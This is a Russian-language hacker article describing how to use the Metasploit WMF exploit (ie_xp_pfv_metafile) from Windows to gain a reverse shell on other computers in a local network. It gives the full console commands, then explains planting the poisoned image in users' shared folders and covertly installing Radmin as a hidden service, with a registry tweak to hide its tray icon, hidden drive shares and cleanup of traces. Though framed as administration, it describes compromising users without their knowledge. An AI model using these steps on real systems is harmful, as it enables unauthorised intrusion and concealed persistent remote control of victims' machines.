Кто не слышал про WMF-баг, с помощью которого можно получить шелл-доступ к практически любому компьютеру использующему системную библиотеку для обработки WMF-файлов?
Наверно многие, регулярно читающие ][ знают.
Однако многие Win-пользователи, читающие журнал ][ не смогли его использовать по следующим причинам:
1) Отсутствие доступа к никсовому шеллу на удалённом компьютере;
2) Не знание, слабое знание других систем: FreeBSD, LINUX.
Возникает вопрос зачем ломать WIN – компьютеры с никсовых шеллов?
Почему, бы не протестировать эксплотит c WIN на WIN спросите вы?
Не будем разбирать экзотические варианты по вышеуказанным причинам, типа установки под Virtual PC или WMWARE альтернативных систем, а также Cygwin (хотя без него не обойтись, смотри далее). Сделаем всё проще запустим перловый эксплотит в windows.
На диске ][ #86 --- лежал пакет Fгаmеwork - но он для никсов!!!
Xотя и в его составе есть сплоит ie_xp_pfv_metafile.pm На практике при запуске в Active perl for Win32 он не работает , точнее не работает весь пакет Metasploit Fгаmеwork 2.5
Идём по ссылке http://www.metasploit.com/projects/Framework/downloads.html и скачиваем - “Metasploit fгаmеwork 2.5 Win32 Cygwin Installer”, запускаем MSFConsole , делаем ls exploits и с сожалением обнаруживаем что ie_xp_pfv_metafile.pm там нет!!! Вот облом, подумаете Вы..
Где взять? Ответ прост на DVD ][ или скачать Metasploit ifгаmеwork 2.5 для никсов – в этом пакете он присутствует! То есть достаточно его перекопировать в папку exploits и пользуйтесь на здоровье!
Вот так, для Win-пользователей всё упрощается.
Всё протестировано на двух WIN_XP_SP2 в локальной сети и работает!!!
Что делать дальше, когда Вы получили шелл-доступ с правами систем к удалённому компьютеру с WINDOWS зависит от Вашей фантазии.
Для примера расскажу что можно сделать в локальной сети для пользы (точнее для упрощённого администрирования WIN-систем администратором).
1. Удалённая скрытая установка RemoteAdminisrator
(RA-система удалённого администрирования, типа удалённый рабочий стол).

Не всегда есть доступ к компьютеру пользователя (компьютер занят пользователем, далеко и т. д.). Поэтому воспользуемся WMF – багом и поставим на его компьютер RA удалённо, по локальной сети.
Как правило (у нас в локалке, например) каждый юзверь имеет расшареную папку разрешённую для записи и в основном пользуется стандартным проводником (никуда от него не деться – стандартная оболочка, используется в любой программе – файл\открыть файл\сохранить).
Запускаем консоль MSFConsole ну а дальше как в ][ № ---, кто не читал, повторюсь
msf > use ie_xp_pfv_metafile – будем использовать сплоит для WMF
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse – цепляем реверс-шелл для win32
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST ххх.ххх.ххх.ххх – устанавливаем IP куда будет коннектится реверс-шелл
LHOST -> xxx.xxx.xxx.xxx
msf ie_xp_pfv_metafile(win32_reverse) > exploit – запускаем эксплоит[*] Starting Reverse Handler.[*] Waiting for connections to http://ххх.ххх.ххх.ххх:8080/ - Поднимается Web-сервер на ранее указанном адресе и ждёт подключений.

Через IE на нашей системе зайдём на этот Web-сервер и опа… взломаем сами себя (ну это не страшно). В консоли сделаем exit и не будем над собой издеваться.
Теперь зайдём в IE в Сервис\Свойства\Общие\Пара� �етры…\Просмотр файлов…. И найдём ядовитый tiff-файл, содержащий шелл-код, имя файла будет что-то типа «M16R14KtkTuEys0Iqt9M4vqK3ny4Kh1vem[2].tiff»
Остаётся скопировать этот файл в папку юзверя (предварительно подняв web-сервер ещё раз на своём компьютере) и ждать когда он откроет папку, содержащую наш ядовитый файл с шелл-кодом.

Дождались соединения, юзверь в этот момент ничего не заметит, (если не посмотрит в процессы и не увидит там cmd.exe).
Дальше зальём ему RA (предварительно упаковав в SFX-архив RA.exe сам r_server.exe и две необходимые библиотеки AdmDll.dll, raddrv.dll а так же reg-файл для скрытия иконки r_server`a в трее Hide_RA.reg – он меняет один ключ, вот его содержание:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"DisableTrayIcon"=hex:01,00,00,00
Примечание:
Для упаковки в SFX-архив (самораспаковывающийся архив) использовал WinRAR v. 3.2 со следующими параметрами:
Path=.\%SystemRoot%\system32\
SavePath
Silent=1
Overwrite=2
Можете задать другие, но на мой взгляд это оптимальные.
Далее в консоли (уже в консоли cmd) пишем:
cd \ `перейти в корень диска
cd %SystemRoot%\system32 `задаём текущую папку system32
net share C$$=C: `расшариваем диск C: юзверя – он невидим в сетевом окружении
net share D$$=D: `расшариваем диск D: тоже (не знаем где система стоит, может и на D
copy /y \\имя компьютера_\Папка_RA\ra.exe %SystemRoot%\system32 `копируем архив RA в системную папку юзверя
cmd /c ra.exe `распаковываем всё необходимое для установки r_server и запуска его в скрытом режиме
r_server /install /silence `инсталлируем r_server.exe в скрытом режиме как службу
reg import Hide_RA.reg `скрываем иконку r_server.exe в трее
r_server /start /silence `запускаем скрытно службу r_server.exe
`Всё r_server.exe ждёт подключений клиента…
delete ra.exe `удаляем архив
net share C$$ /delete `удаляем шары
net share D$$ /delete
exit `выходим из консоли cmd


Можно включить в архив run.cmd файл вида:

r_server /silence /install
reg import Hide_RA.reg
r_server /silence /start
delete ra.exe
net share C$$ /delete
net share D$$ /delete
exit

тогда после: «cmd /c ra.exe» в консоли надо запустить на исполнение его, например так
cmd /c run.cmd `инсталлируем и запускаем службу r_server, затем убираем следы
exit `выходим из консоли cmd (шелла удалённого компьютера) в консоль MFS

msf ie_xp_pfv_metafile(win32_reverse) > exploit `и так далее остальных юзверей…


Все права защищены -=lebed=- (c)


Вышла новая версия пакета для Win,
качать тут: http://metasploit.com/tools/framework-2.6.exe